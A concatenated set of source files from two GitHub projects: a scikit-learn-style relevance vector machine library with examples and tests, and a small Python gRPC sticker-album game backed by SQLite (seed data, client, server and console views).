self.Phi_ = self.Phi_ / self._scale
if self.bias_used:
self.Phi_ = np.hstack((np.ones((n_samples, 1)), self.Phi_))
M = self.Phi_.shape[1]
self.y = y
if self.init_alpha == None:
self.init_alpha = 1 / M ** 2
self.relevance_ = np.array(range(n_samples))
if self.kernel != "precomputed":
self.relevance_vectors_ = X
else:
self.relevance_vectors_ = None
if self.beta_fixed == "not_fixed":
# Suggested in the paper [1].
self.beta_ = 1e-6
else:
self.beta_ = self.beta_fixed
self.mu_ = np.zeros(M)
self.alpha_ = self.init_alpha * np.ones(M)
self._alpha_old = self.alpha_.copy()
for i in range(self.max_iter):
self._posterior()
# Well-determinedness parameters (gamma)
self.gamma_ = 1 - self.alpha_ * np.diag(self.Sigma_)
self.alpha_ = np.maximum(self.gamma_, self.epsilon) / (
self.mu_ ** 2) + self.epsilon
self.alpha_ = np.clip(self.alpha_, 0, self.alpha_max)
if not self.beta_fixed:
ed = np.sum((y - self.Phi_ @ self.mu_) ** 2)
self.beta_ = np.maximum((n_samples - np.sum(self.gamma_)),
self.epsilon) / ed + self.epsilon
if self.compute_score:
raise ("Score not yet implemented.")
self._prune()
if self.verbose:
print("Iteration: {}".format(i))
print("Alpha: {}".format(self.alpha_))
print("Beta: {}".format(self.beta_))
print("Gamma: {}".format(self.gamma_))
print("m: {}".format(self.mu_))
print("Relevance Vectors: {}".format(
self.relevance_.shape[0]))
if self.compute_score:
pass
print()
delta = np.amax(
np.absolute(np.log(self.alpha_ + self.epsilon) - np.log(
self._alpha_old + self.epsilon)))
if delta < self.tol and i > 1:
break
self._alpha_old = self.alpha_.copy()
return self
else:
self.multi_ = None
self.multi_ = OneVsRestClassifier(self)
self.multi_.fit(X, y)
return self
def predict_proba(self, X):
"""Return an array of class probabilities."""
#check_is_fitted(self, ["relevance_", "mu_", "Sigma_"])
if len(self.classes_) == 2:
X = check_array(X)
n_samples = X.shape[0]
K = self._get_kernel(X, self.relevance_vectors_)
K = K / self._scale
if self.bias_used:
K = np.hstack((np.ones((n_samples, 1)), K))
y = self._classify(self.mu_, K)
return np.column_stack((1 - y, y))
else:
return self.multi_.predict_proba(X)
def predict(self, X):
"""Predict using the RVC model.
In addition to the mean of the predictive distribution, its
standard deviation can also be returned.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Query points to be evaluate.
Returns
-------
results : array, shape = (n_samples, [n_output_dims])
Mean of predictive distribution at query points
"""
# Check is fit had been called
#check_is_fitted(self, ["relevance_", "mu_", "Sigma_"])
if len(self.classes_) == 2:
y = self.predict_proba(X)
results = np.empty(y.shape[0], dtype=self.classes_.dtype)
results[y[:, 1] <= 0.5] = self.classes_[0]
results[y[:, 1] >= 0.5] = self.classes_[1]
return results
else:
return self.multi_.predict(X)
|
Mind-the-Pineapple/sklearn-rvm | examples/plot_rvm_for_classification.py | <reponame>Mind-the-Pineapple/sklearn-rvm<gh_stars>10-100
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
RVM for classification
=========================================================
Based on https://github.com/ctgk/PRML/blob/master/notebooks/ch07_Sparse_Kernel_Machines.ipynb
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn_rvm import EMRVC
def create_toy_data():
x0 = np.random.normal(size=100).reshape(-1, 2) - 1.
x1 = np.random.normal(size=100).reshape(-1, 2) + 1.
x = np.concatenate([x0, x1])
y = np.concatenate([np.zeros(50), np.ones(50)]).astype(np.int)
return x, y
x_train, y_train = create_toy_data()
model = EMRVC(kernel="rbf")
model.fit(x_train, y_train)
x0, x1 = np.meshgrid(np.linspace(-4, 4, 100), np.linspace(-4, 4, 100))
x = np.array([x0, x1]).reshape(2, -1).T
plt.scatter(x_train[:, 0], x_train[:, 1], s=40, c=y_train, marker="x")
plt.scatter(model.relevance_vectors_[:, 0], model.relevance_vectors_[:, 1], s=100, facecolor="none", edgecolor="g")
plt.contourf(x0, x1, model.predict_proba(x)[:, 1].reshape(100, 100), np.linspace(0, 1, 5), alpha=0.2)
plt.colorbar()
plt.xlim(-4, 4)
plt.ylim(-4, 4)
plt.gca().set_aspect("equal", adjustable="box")
|
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/__init__.py | from .em_rvm import EMRVR, EMRVC
from ._version import __version__
__all__ = ['EMRVR', 'EMRVC', '__version__']
|
Mind-the-Pineapple/sklearn-rvm | examples/plot_compare_rvr_svr.py | <reponame>Mind-the-Pineapple/sklearn-rvm
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=====================================================================
Comparison of relevance vector machine and support vector machine
=====================================================================
"""
print(__doc__)
import time
import matplotlib.pyplot as plt
import numpy as np
from sklearn.svm import SVR
from sklearn_rvm import EMRVR
np.random.seed(8)
rng = np.random.RandomState(0)
# Generate sample data
X = 4 * np.pi * np.random.random(100) - 2 * np.pi
y = np.sinc(X)
y += 0.25 * (0.5 - rng.rand(X.shape[0])) # add noise
X = X[:, None]
# Fit SVR
svr = SVR(kernel="rbf", gamma="auto")
stime = time.time()
svr.fit(X, y)
print("Time for SVR fitting: %.3f" % (time.time() - stime))
# Fit RVR
rvr = EMRVR(kernel="rbf")
stime = time.time()
rvr.fit(X, y)
print("Time for RVR fitting: %.3f" % (time.time() - stime))
X_plot = np.linspace(-2 * np.pi, 2 * np.pi, 10000)[:, None]
# Predict using SVR
stime = time.time()
y_svr = svr.predict(X_plot)
print("Time for SVR prediction: %.3f" % (time.time() - stime))
# Predict using Rvm
stime = time.time()
y_rvr = rvr.predict(X_plot, return_std=False)
print("Time for RVR prediction: %.3f" % (time.time() - stime))
stime = time.time()
y_rvr, y_std = rvr.predict(X_plot, return_std=True)
print("Time for RVR prediction with standard-deviation: %.3f" % (time.time() - stime))
# Plot results
fig = plt.figure(figsize=(10, 5))
lw = 2
fig.suptitle("RVR versus SVR", fontsize=16)
plt.subplot(121)
plt.scatter(X, y, marker=".", c="k", label="data")
plt.plot(X_plot, np.sinc(X_plot), color="navy", lw=lw, label="True")
plt.plot(X_plot, y_svr, color="turquoise", lw=lw, label="SVR")
support_vectors_idx = svr.support_
plt.scatter(X[support_vectors_idx], y[support_vectors_idx], s=80, facecolors="none", edgecolors="r",
label="support vectors")
plt.ylabel("target")
plt.xlabel("data")
plt.legend(loc="best", scatterpoints=1, prop={"size": 8})
plt.subplot(122)
plt.scatter(X, y, marker=".", c="k", label="data")
plt.plot(X_plot, np.sinc(X_plot), color="navy", lw=lw, label="True")
plt.plot(X_plot, y_rvr, color="darkorange", lw=lw, label="RVR")
plt.fill_between(X_plot[:, 0], y_rvr - y_std, y_rvr + y_std, color="darkorange", alpha=0.2)
relevance_vectors_idx = rvr.relevance_
plt.scatter(X[relevance_vectors_idx], y[relevance_vectors_idx], s=80, facecolors="none", edgecolors="r",
label="relevance vectors")
plt.xlabel("data")
plt.legend(loc="best", scatterpoints=1, prop={"size": 8})
plt.show()
|
Mind-the-Pineapple/sklearn-rvm | setup.py | <gh_stars>10-100
#! /usr/bin/env python
"""A template for scikit-learn compatible packages."""
import codecs
import os
from setuptools import find_packages, setup
# get __version__ from _version.py
ver_file = os.path.join('sklearn_rvm', '_version.py')
with open(ver_file) as f:
exec(f.read())
DISTNAME = 'sklearn_rvm'
DESCRIPTION = 'An scikit-learn style implementation of Relevance Vector Machines (RVM).'
with codecs.open('README.rst', encoding='utf-8-sig') as f:
LONG_DESCRIPTION = f.read()
MAINTAINER = '<NAME>, <NAME>'
MAINTAINER_EMAIL = '<EMAIL>, <EMAIL>'
URL = 'https://github.com/Mind-the-Pineapple/sklearn-rvm'
LICENSE = 'new BSD'
DOWNLOAD_URL = 'https://github.com/Mind-the-Pineapple/sklearn-rvm'
VERSION = __version__
INSTALL_REQUIRES = ['numpy', 'scipy', 'scikit-learn']
CLASSIFIERS = ['Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved',
'Programming Language :: Python',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7']
EXTRAS_REQUIRE = {
'tests': [
'pytest',
'pytest-cov'],
'docs': [
'sphinx',
'sphinx-gallery',
'sphinx_rtd_theme',
'numpydoc',
'matplotlib'
]
}
setup(name=DISTNAME,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
license=LICENSE,
url=URL,
version=VERSION,
download_url=DOWNLOAD_URL,
long_description=LONG_DESCRIPTION,
zip_safe=False, # the package can run out of an .egg file
classifiers=CLASSIFIERS,
packages=find_packages(),
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE) |
Mind-the-Pineapple/sklearn-rvm | examples/plot_compare_rvr_ard.py | <reponame>Mind-the-Pineapple/sklearn-rvm
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=====================================================================
Comparison of relevance vector regression and ARDRegression
=====================================================================
Based on https://scikit-learn.org/stable/auto_examples/linear_model/plot_ard.html#sphx-glr-auto-examples-linear-model-plot-ard-py
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from scipy import stats
from sklearn.linear_model import ARDRegression
from sklearn_rvm import EMRVR
# #############################################################################
# Generating simulated data with Gaussian weights
# Parameters of the example
np.random.seed(0)
n_samples, n_features = 100, 100
# Create Gaussian data
X = np.random.randn(n_samples, n_features)
# Create weights with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
# #############################################################################
# Fit the ARD Regression
clf = ARDRegression(compute_score=True)
clf.fit(X, y)
rvr = EMRVR(kernel="linear")
rvr.fit(X, y)
# #############################################################################
# Plot the true weights, the estimated weights, the histogram of the
# weights, and predictions with standard deviations
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(rvr.coef_, color="darkblue", linestyle="-", linewidth=2, label="RVR estimate")
plt.plot(clf.coef_, color="yellowgreen", linestyle=":", linewidth=2, label="ARD estimate")
plt.plot(w, color="orange", linestyle="-", linewidth=2, label="Ground truth")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc=1)
plt.show()
|
Mind-the-Pineapple/sklearn-rvm | examples/simple_example_precomputed.py | <reponame>Mind-the-Pineapple/sklearn-rvm<filename>examples/simple_example_precomputed.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Simple example precomputed
========================================================="""
print(__doc__)
import numpy as np
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn_rvm import EMRVC
# General a toy dataset:s it's just a straight line with some Gaussian noise:
n_samples = 100
np.random.seed(0)
X = np.random.normal(size=n_samples)
y = (X > 0).astype(np.float)
X[X > 0] *= 4
X += .3 * np.random.normal(size=n_samples)
X = X[:, np.newaxis]
K = pairwise_kernels(X)
# Fit the classifier
clf = EMRVC(kernel="precomputed")
clf.fit(K, y)
print(clf.predict(K))
print(clf.predict_proba(K))
print(clf.score(K, y))
|
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/tests/performance.py | # import timeit
#
#
# # Time classification with the iris dataset.
#
# setup_c = """
# from sklearn.datasets import load_iris
# from sklearn_rvm import EMRVC
# iris = load_iris()
# X = iris.data
# y = iris.target
# clf = EMRVC()
# """
#
# time = timeit.timeit("clf.fit(X, y)", setup=setup_c, number=10)
#
# print("10 runs of Iris classification fitting took {} seconds.".format(time))
#
# # Time regression with the boston ds.
#
# setup_r = """
# from sklearn.datasets import load_boston
# from sklearn_rvm import EMRVR
# boston = load_boston()
# X = boston.data
# y = boston.target
# clf = EMRVR()
# """
#
# time = timeit.timeit("clf.fit(X, y)", setup=setup_r, number=10)
#
# print("10 runs of boston refression fitting took {} seconds.".format(time)) |
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/tests/test_regressor.py | import pytest
import numpy as np
from sklearn_rvm import EMRVR
from sklearn.metrics.pairwise import pairwise_kernels
from sklearn import datasets
boston = datasets.load_boston()
rng = np.random.RandomState(0)
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_simple_fit_predict():
X = np.array([[0, 0], [2, 2]])
y = np.array([0.0, 2.5 ])
clf = EMRVR()
X_test = np.array([[5,5]])
clf.fit(X,y)
pred = clf.predict(X_test)
assert pred != None
def test_precomputed_fit_predict():
kernel = pairwise_kernels(boston.data, metric='linear')
clf = EMRVR(kernel = "precomputed")
clf.fit(kernel, boston.target)
pred = clf.predict(kernel)
assert pred.shape == boston.target.shape
|
Mind-the-Pineapple/sklearn-rvm | sklearn_rvm/tests/test_classifier.py | #import pytest
import numpy as np
from sklearn_rvm import EMRVC
from sklearn import datasets
from sklearn.multiclass import OneVsRestClassifier
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_simple_fit_predict():
X = np.array([-1, -1, -1,-1, 1, 1, 1, 1]).reshape(-1,1)
y = np.array([0, 0, 0, 0, 1, 1, 1, 1])
clf = EMRVC()
pred = clf.fit(X,y).predict(X)
assert pred.all() == y.all()
def test_multiclass_fit_predict():
ovr = OneVsRestClassifier(EMRVC())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
clf = EMRVC()
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) == np.mean(iris.target == pred2)
ovr = OneVsRestClassifier(EMRVC())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) > 0.65
|
Mind-the-Pineapple/sklearn-rvm | examples/simple_example.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
=========================================================
Simple example
=========================================================
"""
print(__doc__)
import numpy as np
from sklearn_rvm import EMRVC
# General a toy dataset:s it's just a straight line with some Gaussian noise:
n_samples = 100
np.random.seed(0)
X = np.random.normal(size=n_samples)
y = (X > 0).astype(np.float)
X[X > 0] *= 4
X += .3 * np.random.normal(size=n_samples)
X = X[:, np.newaxis]
# Fit the classifier
clf = EMRVC(kernel="linear")
clf.fit(X, y)
print(clf.predict(X))
print(clf.predict_proba(X))
print(clf.score(X, y))
|
adrianomqsmts/OneFigure-gRPC | SQLite/data.py | <gh_stars>0
import sqlite3
conn = sqlite3.connect('oneFigure.db')
cursor = conn.cursor()
# inserindo dados na tabela
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'RARA', 'Monkey D Luffy.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Vismoke Sanji', 'RARA', 'Sanji.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Roronoa Zoro', 'RARA', 'Zoro.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Corazon', 'COMUM', 'Corazon.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Monkey D. Garp', 'RARA', 'Monkey D Garp.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Charlotte Katakuri', 'RARA', 'Charlotte Katakuri.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Edward Newgate', 'ÉPICA', 'Edward Newgate.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Sabo', 'COMUM', 'Sabo.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Shanks', 'ÉPICA', 'Shanks.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'ÉPICA', 'Gol D Roger.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Portgas D. Ace', 'COMUM', 'Portgas D Ace.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'RARA', 'Silvers Rayleigh.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Brook', 'COMUM', 'Brook.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'COMUM', 'T<NAME> Chopper.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Aokiji', 'RARA', 'Aokij.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Eustass Kid', 'COMUM', 'Eustass Kid.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Bartolomeo', 'COMUM', 'Bartolomeo.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('A<NAME>', 'COMUM', 'Affe D. Drache.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Franky', 'COMUM', 'Franky.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Donquixote Doflamingo', 'RARA', 'Donquixote Doflamingo.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Boa Hancock', 'RARA', 'Boa Hancock.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Vinsmoke Reiju', 'COMUM', 'Vinsmoke Reiju.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'COMUM', 'Marco the Phoenix.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Usopp', 'COMUM', 'Usopp.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'COMUM', 'Nico Robin.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Zeff', 'COMUM', 'Zeff.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Crocodile', 'COMUM', 'Crocodile.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Smoker', 'COMUM', 'Smoker.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Bentham', 'COMUM', 'Bentham.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Emporio Ivankov', 'COMUM', 'Emporio Ivankov.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Nekomamushi', 'COMUM', 'Nekomamushi.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Bartholomew Kuma', 'COMUM', 'Bartholomew Kuma.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Kizaru', 'RARA', 'Kizaru.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('<NAME>', 'COMUM', '<NAME>.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Juracule Mihawk', 'COMUM', 'Juracule Mihawk.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Cavendish', 'COMUM', 'Cavendish.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Perona', 'COMUM', 'Perona.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Benn Beckman', 'RARA', 'Benn Beckman.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Viola', 'COMUM', 'Viola.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Bepo', 'COMUM', 'Bepo.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Foxfire Kin''emon', 'COMUM', 'Foxfire Kin''emon.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Nefertari Vivi', 'COMUM', 'Nefertari Vivi.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Caesar Clown', 'COMUM', 'Caesar Clown.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Basil Hawkins', 'COMUM', 'Basil Hawkins.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Kaido', 'COMUM', 'Kaido.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Eneru', 'COMUM', 'Eneru.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Sengoku', 'COMUM', 'Sengoku.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Nami', 'COMUM', 'Nami.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Buggy', 'RARA', 'Buggy.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Carrot', 'COMUM', 'Carrot.png');
""")
cursor.execute("""
INSERT INTO `figure` (`name`, `rarity`, `path`) VALUES ('Monkey D Dragon', 'ESPECIAL', 'Dragon.png');
""")
cursor.execute("""
INSERT INTO `usuario` (`name`, `password`, `balance`) VALUES ('teste', '<PASSWORD>', 10000);
""")
cursor.execute("""
INSERT INTO `usuario` (`name`, `password`, `balance`) VALUES ('user', 'user', 10000);
""")
cursor.execute("""
INSERT INTO `usuario` (`name`, `password`, `balance`) VALUES ('fulano', '<PASSWORD>', 10000);
""")
# gravando no bd
conn.commit()
print('Dados inseridos com sucesso.')
conn.close()
|
adrianomqsmts/OneFigure-gRPC | controller/client.py | import grpc
import proto.message_pb2_grpc as pb2_grpc
import proto.message_pb2 as pb2
class Client(object):
def __init__(self):
self.host = 'localhost'
self.server_port = 50051
# Instanciando o Canal
self.channel = grpc.insecure_channel('{}:{}'.format(self.host, self.server_port))
# Ligando o cliente e o Servidor
self.stub = pb2_grpc.MessageStub(self.channel)
def login(self, name, password):
message = pb2.MessageClient(name=name, password=password)
return self.stub.Login(message)
def create(self, name, password):
message = pb2.MessageClient(name=name, password=password)
return self.stub.Create(message)
def album(self, idUser):
message = pb2.MessageClient(idUser=idUser)
return self.stub.Album(message)
def buy(self, idUser):
message = pb2.MessageClient(idUser=idUser)
return self.stub.Buy(message)
def sell(self, idUser, idFigure):
message = pb2.MessageClient(idUser=idUser, idFigure=idFigure)
return self.stub.Sell(message)
def createTrade(self, idUser, offer, taking):
message = pb2.MessageClient(idUser=idUser, offer=offer, taking=taking)
return self.stub.CreateTrade(message)
def listTrade(self):
message = pb2.MessageClient()
return self.stub.ListTrade(message)
def trade(self, idUser, idTrade):
message = pb2.MessageClient(idUser=idUser, idTrade=idTrade)
return self.stub.Trade(message)
|
adrianomqsmts/OneFigure-gRPC | view/singin.py | <gh_stars>0
from controller.client import Client
def singinview(name, password):
response = _singin(name, password)
if response:
print('Conta criada com sucesso.')
else:
print('Não foi possível criar a conta, possívelmente o nome já existe')
return response
def _singin(name, password):
client = Client()
response = client.create(name=name, password=password)
isvalid = response.response
return isvalid
|
adrianomqsmts/OneFigure-gRPC | server.py | <gh_stars>0
from controller.server import serve
if __name__ == '__main__':
serve()
|
adrianomqsmts/OneFigure-gRPC | view/login.py | <reponame>adrianomqsmts/OneFigure-gRPC
import json
from controller.client import Client
def loginview(name, password):
isvalid, user, figure = _login(name, password)
if isvalid:
print('Bem-vindo {}'.format(user.name))
if user.showcard:
print('\n ------------ Figurinha Adquirida no Sorteio díario ------------------')
print("ID | NOME | RARIDADE | ")
print(figure.idFigure, '|', figure.name, '|', figure.rarity, '\n')
return user, isvalid, figure
else:
print('Nome e/ou senha inválidos')
return None, None, None
def _login(name, password):
client = Client()
response = client.login(name=name, password=password)
isvalid = response.response
user = response.user
figure = response.figure
return isvalid, user, figure
|
adrianomqsmts/OneFigure-gRPC | controller/server.py | <filename>controller/server.py
import grpc
from concurrent import futures
import proto.message_pb2_grpc as pb2_grpc
import proto.message_pb2 as pb2
import model.user as user
import model.album as album
import model.figura as figure
class MessageService(pb2_grpc.MessageServicer):
def __init__(self, *args, **kwargs):
pass
def Login(self, request, context):
print('Login -> Name:', request.name, ' - Password: ', request.password)
name = request.name
password = request.password
database = user.login(name=name, password=password)
if database:
usuario = {
'idUser': int(database[0]['idUser']),
'name': database[0]['name'],
'balance': float(database[3]),
'password': database[0]['password'],
'showcard': int(database[2]['showcard']),
}
if int(database[2]['showcard']):
figure = {
'idFigure': database[1]['idFigure'],
'rarity': database[1]['rarity'],
'name': database[1]['name'],
'path': database[1]['path']
}
else:
figure = None
out = {'response': True, 'user': usuario, 'figure': figure}
else:
out = {'response': False, 'user': None, 'figure': None}
print('Response <- ', f'{out}')
return pb2.LoginResponse(**out)
def Create(self, request, context):
print('Create -> Name:', request.name, ' - Password: ', request.password)
name = request.name
password = request.password
database = user.create(name=name, password=password)
if database:
result = {
'response': True,
}
else:
result = {
'response': False,
}
print('Response <- ', f'{result}')
return pb2.Response(**result)
def Album(self, request, context):
print('Album -> IdUser:', request.idUser)
idUser = request.idUser
database = album.show(id_user=idUser)
if database:
complete = int(database[1]['complete'])
if complete:
special = {
'idFigure': database[2]['idFigure'],
'rarity': database[2]['rarity'],
'name': database[2]['name'],
'path': database[2]['path']
}
else:
special = None
figures = []
newdata = sorted(database[0], key=lambda k: k['idFigure'])
for data in newdata:
figures.append({
'idFigure': data['idFigure'],
'name': data['name'],
'rarity': data['rarity'],
'path': data['path'],
'quantity': data['quantity']
})
out = {
'response': True,
'complete': complete,
'special': special,
'figures': figures,
}
else:
out = {
'response': False,
'complete': 0,
'special': None,
'figures': None,
}
print('Response <- ', f'{out}')
return pb2.AlbumResponse(**out)
def Buy(self, request, context):
print('Buy -> IdUser:', request.idUser)
idUser = request.idUser
database = figure.buy(idUser)
result = []
if database:
balance = float(database[3])
del database[3]
for i in range(3):
result.append({
'idFigure': database[i]['idFigure'],
'rarity': database[i]['rarity'],
'name': database[i]['name'],
'path': database[i]['path']
})
figures = result
out = {
'response': True,
'balance': balance,
'figures': figures,
}
else:
out = {
'response': False,
'balance': None,
'figures': None,
}
print('Response <- ', f'{out}')
return pb2.AlbumResponse(**out)
def CreateTrade(self, request, context):
print('Create Trade -> IdUser:', request.idUser, ' - Offer ID:', request.offer, ' - Taking ID:', request.taking)
idUser = request.idUser
offer = request.offer
taking = request.taking
if (offer >= 0) and (taking >= 0) and (offer <= 50) and (taking <= 50):
database = figure.createTrade(idUser=idUser, offer=offer, taking=taking)
if database:
out = {
'response': True,
}
else:
out = {
'response': False,
}
else:
out = {
'response': False,
}
print('Response <- ', f'{out}')
return pb2.Response(**out)
def ListTrade(self, request, context):
print('Listar Trocas -> ')
database = figure.listTrade()
if database:
result = []
for data in database:
result.append({
'name': data['name'],
'idTrade': data['idTrade'],
'offerID': data['offerID'],
'offerName': data['offerName'],
'offerRarity': data['offerRarity'],
'takingID': data['takingID'],
'takingName': data['takingName'],
'takingRarity': data['takingRarity']
})
out = {
'response': True,
'list': result
}
else:
out = {
'response': False,
'list': None
}
print('response <-', f'{result}')
return pb2.ListTradeResponse(**out)
def Sell(self, request, context):
print('Sell -> ID User: ', request.idUser, ' - ID Figure: ', request.idFigure)
database = figure.sell(request.idUser, request.idFigure)
print(database)
if database:
name = database['name']
price = float(database['price'])
out = {
'response': True,
'price': price,
'name': name
}
else:
out = {
'response': False,
'price': None,
'name': None
}
print('Response <- ', out)
return pb2.SellResponse(**out)
def Trade(self, request, context):
print('Trade -> ID User: ', request.idUser, ' - ID Trade: ', request.idTrade)
idUser = request.idUser
idTrade = request.idTrade
database = figure.trade(idUser, idTrade)
if database:
out = {
'response': True
}
else:
out = {
'response': False
}
print('Responde <- ', out)
return pb2.Response(**out)
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
pb2_grpc.add_MessageServicer_to_server(MessageService(), server)
server.add_insecure_port('[::]:50051')
server.start()
print('SERVIDOR INICIADO...')
server.wait_for_termination()
|
adrianomqsmts/OneFigure-gRPC | view/offer.py | <filename>view/offer.py
import json
from controller.client import Client
def offerview(user, offer, taking):
isvalid = _offer(user, offer, taking)
if isvalid:
print('A troca foi anunciada')
return isvalid
else:
print('Lamentamos, mas não alguma coisa não está correta (quantidade insuficente ou ID incorreto)')
return None
def _offer(user, offer, taking):
client = Client()
response = client.createTrade(idUser=user.idUser, offer=offer, taking=taking)
isvalid = response.response
return isvalid
|
adrianomqsmts/OneFigure-gRPC | SQLite/tables.py | <reponame>adrianomqsmts/OneFigure-gRPC
# 02_create_schema.py
import sqlite3
# conectando...
conn = sqlite3.connect('oneFigure.db')
# definindo um cursor
cursor = conn.cursor()
# criando a tabela (schema)
cursor.execute("""
CREATE TABLE IF NOT EXISTS `Usuario` (
`idUser` INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
`name` VARCHAR(45) NOT NULL UNIQUE,
`balance` DOUBLE NOT NULL DEFAULT 100,
`password` VARCHAR(45) NOT NULL,
